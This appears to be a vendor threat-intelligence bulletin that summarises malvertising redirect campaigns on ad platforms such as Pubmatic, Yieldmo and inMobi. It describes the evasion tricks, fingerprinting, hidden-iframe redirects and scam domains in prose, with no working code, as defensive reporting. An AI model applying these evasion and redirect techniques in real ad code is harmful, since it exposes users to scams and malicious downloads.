Assessment:  Over the past week, Boltive observed a malicious redirect campaign driving users to a fake landing page or iPhone virus scam.  The malicious ads utlized evastion techniques like string reverse and string concat to avoid detection.  Under favorable technical conditions, these ads do the redirection, otherwise they look benign without any suspicious behavior indicators. 

Affected Platform:  Pubmatic

   

Assessment:  Desktop redirect campaign impacting 1,300 domains.  The malicious code itself relied on user inputs (such as click or scroll) to trigger the redirect.  While this tactic is not new, it is a strategy that has been dormant for much of the year. Users were delivered a fake McAfee virus software popup prompting a download of more malicious code.  The actual malicious ad code attempted to remove important functionality from the ad frame as well as the main frame.  This means that every time the redirection didn't occur there was also a risk that the page itself could break. 

Interestingly, this campaign showed more sophistication in the code, collecting real-time data for analysis.  Fraudsters added random sampling of the ads, indicating that they expected large volumes of traffic, and planned to optimize their campaigns based on the learnings.  The campaign, like many others, looked for the presence of blocking wrappers, in this case ADL and two other competitors.  This is something we expect, and have protection against, a nuance that all publishers/platforms should confirm with their providers.

Affected platforms:  Early intelligence pointed to ReklamStore as the source of the redirects, however, ADL confirmed that Yieldmo was in fact the platform most impacted by this outbreak.

Assessment:  

This malicious campaign has two methods of triggering the redirect. They attempt to load a script by writing a script call to a jquery file from http://ajax.googleapis.com and then run a function to replace all parts of the url to build the malicious payload and sends along fingerprinting information (screen w/h, platform, UA, color depth, number of plugins, timestamp, etc).  It additionally loads a hidden iframe with a source that executes javascript that attempts to do a top.location.replace.  

The ad that is loaded along with this malicious payload is a simple image (either a logo, or a stolen Amazon Fire TV Stick ad) that actually takes a user to an Amazon listing for a firetv stick.

There seem to be two different campaigns active at the moment - one leading to healthnotetoday(dot)com and the other leading to various giftcard scam pages. 

Affected Platforms:  GumGum (buyer has been blocked) & Between Digital

Assessment:  Fraudsters hosting obfuscated scripts on AWS & Yahoo platforms, attempted to deliver malicious redirects to over 300 different domains.  To date, over 600M bad ads have been stopped and remonetized, primarily on mobile devices.   

Affected Platforms:  inMobi

Assessment:  Redirect campaign spanning almost 1,500 sites over the past 7-days.  Creative automatically drove mobile and desktop users to sites like inboxfunpoints[dot]com, 7daynews[dot]com, foxnewstoday[dot]com.  ADL protected over 4.5M ads during the attack.

Affected platforms:  Yieldmo, ReklamStore DSP

   

Read More
`` `` ``